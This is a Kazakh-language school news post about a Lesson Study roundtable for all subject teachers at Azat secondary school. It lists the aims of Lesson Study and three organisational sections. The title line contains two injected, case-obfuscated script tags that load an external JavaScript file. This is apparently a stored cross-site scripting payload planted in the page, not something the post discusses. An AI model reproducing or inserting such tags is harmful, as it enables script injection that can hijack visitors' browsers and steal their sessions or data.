Сабақты зерттеу (L.S)<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.11.2022

Сабақты зерттеу (L.S) сценарийі.
 Азат  орта  мектебінде 3 қараша күні барлық пән мұғалімдерін  қамтыған мектепішілік сабақты зерттеу ( L.S) бойынша дөңгелек үстел өтті.Сабақты зерттеудің үдерісі бір неше қадамнан тұратын циклді үдеріс болып табылады.  С.З.басты мақсаты: жаңа әдіс-тәсілді оқыту мен тәрбиелеу барысында қолдану, озық тәжірибені тарату, мұғалімдердің аттестацияға дайындық барысын қолдау көрсету.
Семинар негізгі 3 секция бойынша ұйымдастырылды:
1. С.З. бойынша шығармашылық топ жұмысын құру, модератор тағайындау.
2. С.З.бойынша оқыту проблемаларын анықтау, оны шешудің әдіс- тәсілдерін анықтау.
З. С.З. бойынша әр топ жұмыс жоспарын құру.
Сабақты зерттеу тобына - педагог- зерттеуші, сарапшы, модератор және деңгейілік, тренер, үйлестіруші  курстан өткен мұғалімдер қатысты.

Просмотров: 837


Пікір қосу



Деректерді қолтаңбаға қосу